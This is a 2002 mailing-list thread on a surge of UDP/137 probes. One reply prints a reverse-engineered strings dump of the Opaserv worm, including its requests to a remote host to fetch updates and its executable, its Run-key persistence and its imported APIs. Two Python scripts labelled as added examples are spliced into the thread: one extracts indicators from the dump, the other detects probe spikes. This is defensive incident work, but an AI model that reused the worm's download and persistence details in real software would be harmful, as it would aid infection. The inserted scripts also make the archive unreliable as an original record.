Security Incidents mailing list archives

RE: Unusual volume: UDP:137 probes


From: Richard.Grant () mail state ky us
Date: Tue, 1 Oct 2002 09:44:29 -0400

We had some internal machines that were contributing to the netbios flood
attack. These machines were sniffed and from that we found a file on the
identified machines named scrsvr.exe. The file was reverse engineered and
the results are listed below. While some are attributing the netbios
activity to Bugbear@mm it does not follow what we were seeing. It is known
as W32.Opaserv.Worm.  Comments?

ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Windows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Internet Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat.ScrSout.dat.scrupd.exe.www.opasoft.com.
GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....
GET http://www.opasoft.com/work/lastver HTTP/1.1..Host: www.opasoft.com.....
GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1..Host: www.opasoft.com.....
POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF&;cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1..Host: www.opasoft.com.....
OK.PLAIN.CIPHER1.KEY.....................................................................
WINDOWS\scrsvr.exe..WINDOWS\win.ini.c:\tmp.ini.c:\windows\scrsvr.exe.,.windows.run..........................................
CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..LOCALHOST
X..wO...?..................?......-@..*@..*@..*@..*@..*@..*@..+@..+@.&+@
.5+@.D+@.S+@.b+@.q+@..+@..+@..+@..+@..+@..+@..+@..,@..,@.
,@./,@.I,@.X,@..O......:.l.Y..xO....i!....~:.V.....o.8N.p!...[...z..O..[
..l.5......c4.Z...~.K/..jM...8.....[..|}..5.o...'.\..N..o....}...5.\'.N.
.B.t..a.P?.....K(....r....Yj4.......,i...=N.{S....\)..:{.A....mM.+.....>
..|R.h..K...4z...`..R.,./.Hj.....6.P..rr.N....-.l...5V..................
.......
.......91)!....:2*"....;3+#....<4,$?7/'....>6.&....=5-%.................
.............................
!"#$%&'()*+,-./012345678.........................................)4.%/7.
..(3-!0..,1'8"5...*2$. ..


.KERNEL32.dll.ADVAPI32.dll.USER32.dll.WS2_32.dll...LocalAlloc....GetCurrentProcess...ExitThread..d.SetFilePointer..
.ResetEvent....ReadFile..H.CreateMutexA....LocalFree...GetModuleFileNameA..p.SetPriorityClass..[.SetEndOfFile....GetModuleHandleA....RegisterServiceProcess../.GetPrivateProfileStringA..3.GetProcAddress....ExitProcess
.4.CopyFileA...LocalReAlloc..M.CreateProcessA..'.CloseHandle...WaitForSingleObject...Sleep.T.CreateThread..@.CreateFileA...GetLastError..V.SetCurrentDirectoryA.._.DeleteFileA...GetFileSize...WriteFile...WritePrivateProfileStringA....lstrcat...lstrcmpi....lstrlen.t.GetWindowsDirectoryA...
.RegSetValueExA....RegQueryValueExA....RegOpenKeyExA...RegDeleteValueA..
.RegCloseKey...PeekMessageA....DispatchMessageA..`.TranslateMessage..j.socket..f.send..d.recvfrom..c.recv..].inet_addr.S.gethostname.R.gethostbyname.P.connect.O.closesocket.N.bind..?.WSAStartup..g.sendto....WSAGetLastError...WSAEventSelect....WSAEnumNetworkEvents....WSACreateEvent....WSACloseEvent.......


.0*040.0.0.0.0.0.0.0.0.1
1'191E1a1.1.1.1.1.1.1.1.1.1.2.2!2&2L2U2j2.2.2.2.2.2.2.3.3
3.0.0j1.2V4o4v4.4.4.4.4.515k5.5.516.9.:9:.:.:.:.;.;.;.;$;.;8;?;O;h;~;.;.
;.;.<.<(<-<><R<d<y<.<.<.<.<,=T=c=.=.=M>s>~>.>.>.>.>.>.>.>.?.?"?a?q?.?...
..
..l....2:4.4.4.6.6.606H6Y6j6p6u6.6.6.6.6.6)757~7.7.7.7.7.7.7.7.7.8-868Q8
]8x8.8.8.8.8.8.8.8.8.9.9&919F9O9Z9o9x9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.:
1:<:S:u:.:.:.:.;1<t<|<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=)=1=9=A=I=
V=^=f=n=v=~=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>$>,>4>;>A>F>N>j>x>.>.>.>
.>.>.>.>.>.>.>.>.>.>.>.?"?0?>?F?Y?f?t?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?..
...0..X....0.0.0.0"0(0-050Q0_0m0x0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1(161A1
L1V1d1l1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2"2*20262<2D2I2Q2W2]2c2{2
.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3$3.343<3H3N3T3\3j3r3z3.3.3.3.3.3.3.3.3.3
.3.3.3.3.3.3.3.3.4.4.4.4%4-454=4E4M4U4[4a4g4o4t4|4.4.4.4.4.4.4.4.4.4.4.4
.4.4.4.5.5$5*50585@5F5L5R5X5]5e5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6)6
1696A6I6Q6Y6a6i6q6y6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7%7-747:7
B7K7S7[7a7f7l7v7~7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8.8&8,848:8E8
I8P8X8`8h8p8x8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9%9+91969>9Z9f9r9x9.9.9.9
.9.9.9.9.9.9.9.9.:.:.:.:.:::F:R:X:o:u:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.;&;2;
8;O;U;[;a;f;n;.;.;.;.;.;.;.;.;.;.;.;.<.<.</<5<;<A<F<N<j<v<.<.<.<.<.<.<.<
.<.<.<.<.<.<.=.=.=
=(=0=7=D=P=^=u={=.=.=.=.=.=.=.=.=.=.=.>.>.>.><>J>R>k>s>{>.>.>.>.>.>.>.>.
.>.>.?.?.?.?<?J?R?k?s?{?.?.?.?.?.?.?.?.?.?.?...@..t....0.0.0.0<0J0R0k0s
0{0.0.0.0.0.0.0.0.0.0.0.1.1.1.1<1J1R1k1s1{1.1.1.1.1.1.1.1.1.1.1.2.2.2*26
2>2I2R2Y2f2l2t2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3%333<3D3W3e3m3s3}3.3.3.3.
3.3.3.3.3.3.3.3.3.3.4.4.4!4'4;4B4J4R4X4`4|4.4.4.4.4.4.4.4.4.4.4.4.5.5.5.
5&5B5P5^5f5.5.5.5.5.5.5.5.5.5.5.5.5.6!6+636;6A6P6l6w6}6.6.6.6.6.6.6.6.6.
6.6.6.7.7.7.7"7*797G7Q7]7d7i7o7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8!8/8=8E8V
8\8b8h8p8x8.8.8.8.8.8.8.8.8.8.8.9.9"9(9.949:9G9O9k9w9.9.9.9.9.9.9.9.9.9.
9.:.:.:.:.:.:.;.;.;.;-;P;_;h;n;w;.;.;.;.;.;.;.;.<-<P<V<\<b<h<n<t<z<.<.<.
<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.="=(=.=4=:=@=F=L=R=X=^=d
=j=p=v=|=.=.=.=.=.=.=.=.=...P..p....3.3.3.3.4.4.4.4.4.4.4.4
4$4(4,4044484<4@4D4H4L4P4T4X4\4.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.
?.?.?...`..L....0.0.0.0.0.0.0
0$0(0,00080<0@0D0H0L0P0X0\0`0d0h0l0p0x0|0.0.0.0.0.0..................

Richard Grant [CNA, GSEC]
Security Engineer
Governor's Office for Technology
Commonwealth of Kentucky
Phone: 502-564-5792
Fax: 502.564.6856
richard.grant () mail state ky us 
Web: http://www.state.ky.us/got/ois/security/security.html

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is
for the sole use of the intended recipient(s) and may contain confidential
and privileged information.  Any unauthorized review, use, disclosure or
distribution is prohibited.  If you are not the intended recipient, please
contact the sender by reply e-mail and destroy all copies of the original
message.
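As an added example, not code from Richard's post or from any vendor, the following Python triage script pulls the defender-relevant indicators out of a strings dump like the one above: the URLs and host to block or alert on, the registry and win.ini locations to check for persistence, the dropped file names, and the imported APIs grouped by capability. The DUMP constant is a constructed excerpt of the strings quoted above with non-printable bytes rendered as '.' exactly as the archive shows them; the capability groupings, the persistence labels and all function names are this example's own choices.

```python
"""Pull indicators out of a strings-style dump of a suspect executable.

Added example, not code from the original post. DUMP is a constructed
excerpt of the strings quoted above; the archive renders non-printable
bytes as '.', so a naive split on '.' would shred hostnames and file
names, and the extraction below uses targeted patterns instead.
"""
import re
from collections import defaultdict

DUMP = (
    r"ScrSvr31415.KERNEL32.dll.RegisterServiceProcess."
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run."
    r"Software\Microsoft\Windows\CurrentVersion\Internet Settings."
    r"ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe."
    r"ScrSin.dat.ScrSout.dat.scrupd.exe.www.opasoft.com."
    r"GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1.."
    r"Host: www.opasoft.com....."
    r"GET http://www.opasoft.com/work/lastver HTTP/1.1..Host: www.opasoft.com....."
    r"GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1..Host: www.opasoft.com....."
    r"WINDOWS\scrsvr.exe..WINDOWS\win.ini.c:\tmp.ini.c:\windows\scrsvr.exe.,.windows.run..."
    r".KERNEL32.dll.ADVAPI32.dll.USER32.dll.WS2_32.dll...LocalAlloc....GetCurrentProcess..."
    r"CreateMutexA....RegisterServiceProcess....CreateProcessA...CreateFileA...WriteFile..."
    r"RegSetValueExA....RegOpenKeyExA...RegDeleteValueA...WritePrivateProfileStringA..."
    r"j.socket..f.send..d.recvfrom..c.recv..].inet_addr.S.gethostname.P.connect.N.bind.."
    r"?.WSAStartup..g.sendto...."
)

# A URL ends at whitespace or at a run of two '.' (two or more null bytes).
URL_RE = re.compile(r"https?://\S+?(?=\s|\.{2}|$)")
HOST_RE = re.compile(r"Host: ([\w-]+(?:\.[\w-]+)+)")
REG_RE = re.compile(r"(?i)software\\[A-Za-z0-9 \\]+")
FILE_RE = re.compile(r"([\w-]+\.(exe|dll|dat|ini))\b")
TOKEN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")

# Imported API names mapped to the capabilities a responder cares about.
CAPABILITIES = {
    "network": re.compile(r"^(?:WSA\w+|socket|send|sendto|recv|recvfrom|bind|connect|"
                          r"closesocket|gethostname|gethostbyname|inet_addr)$"),
    "registry": re.compile(r"^Reg(?:OpenKey|QueryValue|SetValue|DeleteValue|CloseKey)"),
    "file_io": re.compile(r"^(?:CreateFile|ReadFile|WriteFile|CopyFile|DeleteFile|"
                          r"SetFilePointer|SetEndOfFile)"),
    "ini_write": re.compile(r"^(?:Write|Get)PrivateProfileString"),
    # RegisterServiceProcess is the Win9x call that hides a process from the task list.
    "process": re.compile(r"^(?:CreateProcess|CreateThread|CreateMutex|RegisterServiceProcess)"),
}


def triage(dump):
    """Return a dict of indicators extracted from the dump text."""
    files, dlls = set(), set()
    for name, ext in FILE_RE.findall(dump):
        # Windows file names are case-insensitive; normalise so ScrSvr.exe == scrsvr.exe.
        (dlls if ext.lower() == "dll" else files).add(name.lower())
    caps = defaultdict(set)
    for tok in TOKEN_RE.findall(dump):
        for cap, pattern in CAPABILITIES.items():
            if pattern.match(tok):
                caps[cap].add(tok)
    reg_keys = sorted(set(REG_RE.findall(dump)))
    # Two classic autostart locations: the Run key and the win.ini run= line.
    persistence = [f"Run key: {k}" for k in reg_keys
                   if k.lower().endswith("\\currentversion\\run")]
    if "win.ini" in files:
        persistence.append("win.ini run= line")
    return {
        "urls": sorted(set(URL_RE.findall(dump))),
        "hosts": sorted(set(HOST_RE.findall(dump))),
        "registry_keys": reg_keys,
        "files": sorted(files),
        "dlls": sorted(dlls),
        "capabilities": {cap: sorted(names) for cap, names in caps.items()},
        "persistence": persistence,
    }


if __name__ == "__main__":
    for key, value in triage(DUMP).items():
        print(f"{key}: {value}")
```

The output is what a responder would hand to the firewall and desktop teams: one host to block at the proxy, the Run key value and the win.ini line to inspect on each sniffed machine, and the WS2_32 imports that explain the UDP traffic seen on the wire.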




-----Original Message-----
From: Emeric Miszti [mailto:emeric () uksecurityonline com]
Sent: Monday, September 30, 2002 11:55 AM
To: incidents () securityfocus com
Subject: Re: Unusual volume: UDP:137 probes


On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote:
On Monday, September 30, 2002 9:02 AM, John Sage 
[SMTP:jsage () finchhaven com] wrote:
This has received some mention on the UNISOG list and elsewhere, but
not here.

Some people have been seeing unusually high volumes of UDP:137 probes
since about 09/27/02 late, or early 09/28/02.

A few people (who log such things) on the Optus cable network in Australia
have been seeing it too.
In my case since Sep 20 it's gone ...
Sep 20  2 hits
Sep 21, 22, 23 0 hits
Sep 24 3 hits
Sep 25 0 hits
Sep 26 4 hits
Sep 27 2 hits
Sep 28 156 hits Starting at 02:20 (Aust. EST)
Sep 29 410 hits
Sep 30 406 hits up until 18:24


Been seeing exactly the same spike with same patterns. Up from 40 odd scans
on 28/9/2002 to 495 already today.

Incidents.org have picked this up at the Internet Storm Center

http://isc.incidents.org/port_details.html?port=137

No explanations or reasons have been given by anyone yet.

-- 
Emeric Miszti
UK Security Online
http://www.uksecurityonline.com

Tel No: 0870 088 5689
Fax No: 0870 706 2162

PGP Public Key available at 
http://www.uksecurityonline.com/emeric.asc
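Added example, not from any of the posts in this thread: a Python sketch of the detection side of what Mark and Emeric describe, counting UDP/137 hits per day from firewall log lines and flagging the days that jump above a robust baseline. The log lines are constructed in netfilter format with documentation addresses, the daily series is the hit count Mark quoted for Sep 20 to Sep 30, and the window size, floor and multiplier are this example's own choices.

```python
"""Spot a sudden rise in UDP/137 probes from per-day counts.

Added example, not code from the original posts. LOG_LINES are constructed
netfilter-style entries; DAILY_HITS is the per-day series quoted in the
thread. Function names and thresholds are this example's own choices.
"""
import re
from collections import Counter
from statistics import median

# Constructed log lines (documentation IP ranges, not real hosts).
LOG_LINES = [
    "Sep 27 23:58:01 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.4 PROTO=UDP SPT=137 DPT=137 LEN=58",
    "Sep 28 02:20:13 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.4 PROTO=UDP SPT=137 DPT=137 LEN=58",
    "Sep 28 02:20:14 gw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.4 PROTO=UDP SPT=137 DPT=137 LEN=58",
    "Sep 28 02:21:40 gw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.4 PROTO=TCP SPT=4421 DPT=80 LEN=60",
    "Sep 28 02:22:05 gw kernel: IN=eth0 OUT= SRC=203.0.113.12 DST=198.51.100.4 PROTO=UDP SPT=1025 DPT=137 LEN=58",
]

# Per-day UDP/137 hit counts as quoted in the thread for Sep 20 to Sep 30.
DAILY_HITS = [
    ("Sep 20", 2), ("Sep 21", 0), ("Sep 22", 0), ("Sep 23", 0), ("Sep 24", 3),
    ("Sep 25", 0), ("Sep 26", 4), ("Sep 27", 2), ("Sep 28", 156),
    ("Sep 29", 410), ("Sep 30", 406),
]

# Syslog day prefix, then an inbound UDP datagram whose destination port is 137.
UDP137_RE = re.compile(r"^(?P<day>\w{3} +\d{1,2}) .*PROTO=UDP\b.*\bDPT=137\b")


def count_udp137_by_day(lines):
    """Count UDP datagrams to port 137 per calendar day from log lines."""
    counts = Counter()
    for line in lines:
        m = UDP137_RE.match(line)
        if m:
            counts[m.group("day")] += 1
    return dict(counts)


def detect_spikes(series, window=7, min_hits=20, factor=5):
    """Flag days whose count reaches max(min_hits, factor * median of prior window).

    The median, not the mean, is the baseline so that the first spike day does
    not immediately inflate the baseline and hide the days that follow; the
    absolute floor keeps a jump from 0 to 4 hits from raising an alert.
    Returns (day, count, threshold) tuples for the flagged days.
    """
    flagged = []
    for i, (day, count) in enumerate(series):
        prior = [c for _, c in series[max(0, i - window):i]]
        if len(prior) < 3:
            continue  # not enough history to form a baseline
        threshold = max(min_hits, factor * median(prior))
        if count >= threshold:
            flagged.append((day, count, threshold))
    return flagged


if __name__ == "__main__":
    print(count_udp137_by_day(LOG_LINES))
    for day, count, threshold in detect_spikes(DAILY_HITS):
        print(f"{day}: {count} hits (threshold {threshold})")
```

On Mark's series the three days from Sep 28 onward are flagged and nothing before them is, which is the behaviour the thread describes; the floor and multiplier would need retuning for a site whose normal UDP/137 background is not near zero.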


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com









